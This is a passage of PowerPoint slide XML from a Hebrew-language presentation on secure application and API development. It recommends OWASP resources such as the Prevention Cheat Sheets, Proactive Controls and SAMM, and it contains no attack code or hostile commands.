                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId8"/>
                </a:rPr>
                <a:t>Annex</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>שים לב</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>: המסמך מכוון לחוק האמריקאי, לכן מומלץ להתייעץ עם מומחה משפטי לפני השימוש במסמך זה.</a:t>
              </a:r>
              <a:endParaRPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle: Rounded Corners 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5819181" y="2932907"/>
              <a:ext cx="940189" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="205944" y="4009060"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="161562" rIns="285387" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>במקום להוסיף אבטחה לתוך</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> יישומים וממשקי פיתוח (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>APIs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>), יעיל יותר לתכנן את בקרות האבטחה מהשלב הראשון. ארגון </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> ממליץ להשתמש במסמך </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId9"/>
                </a:rPr>
                <a:t>OWASP Prevention Cheat Sheets</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> כדרך טובה לייצר הנחיות כיצד לתכנן אבטחה מהשלבים הראשוניים.</a:t>
              </a:r>
              <a:endParaRPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle: Rounded Corners 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5819181" y="3942369"/>
              <a:ext cx="940189" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ארכיטקטורת פיתוח מאובטח</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="205944" y="5023678"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="161562" rIns="285387" bIns="161563" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>מורכב לבנות בקרות אבטחת מידע חזקות</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> ושימושיות. שימוש בבקרות אבטחת מידע תיקניות מפשט את תהליך פיתוח יישומים וממשקי פיתוח (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>APIs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>) מאובטחים. מסמך</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>OWASP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId10"/>
                </a:rPr>
                <a:t>Proactive Controls</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> הוא התחלה טובה עבור מפתחים, וכן ספריות פיתוח עדכניות מגיעות כיום עם בקרות אבטחת מידע תיקניות עבור הענקת הרשאות, בדיקה, מניעת מתקפת </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> וכו'.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle: Rounded Corners 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5819181" y="4962145"/>
              <a:ext cx="940189" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>בקרות אבטחת</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> מידע</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="205944" y="6038296"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="161563" rIns="285387" bIns="161562" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>על-מנת לייעל את התהליך</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> אשר הארגון שלך עובר בעת פיתוח יישומים וממשקי פיתוח (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>APIs</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>), ארגון </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>OWASP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" kern="1200" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> ממליץ להשתמש במודל </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>OWASP Software Assurance Maturity Model (SAMM</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:hlinkClick r:id="rId11"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>. מודל זה מסייע לארגונים לממש אסטרטגיה לפיתוח מאובטח, המיועד לטפל בסיכונים פרטניים עימם מתמודדים ארגונים.</a:t>
              </a:r>
              <a:endParaRPr lang="he-IL" sz="900" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle: Rounded Corners 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5819181" y="5979462"/>
              <a:ext cx="940189" cy="896112"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="83996" tIns="64946" rIns="83996" bIns="64946" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="444500" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="183024" y="7052915"/>
              <a:ext cx="5608321" cy="773044"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
                <a:alpha val="90000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent4">
                <a:alpha val="90000"/>
                <a:tint val="40000"/>
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:scrgbClr r="0" g="0" b="0"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent4">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247651" tIns="161563" rIns="285387" bIns="161562" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="1" algn="r" defTabSz="444500" rtl="1">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
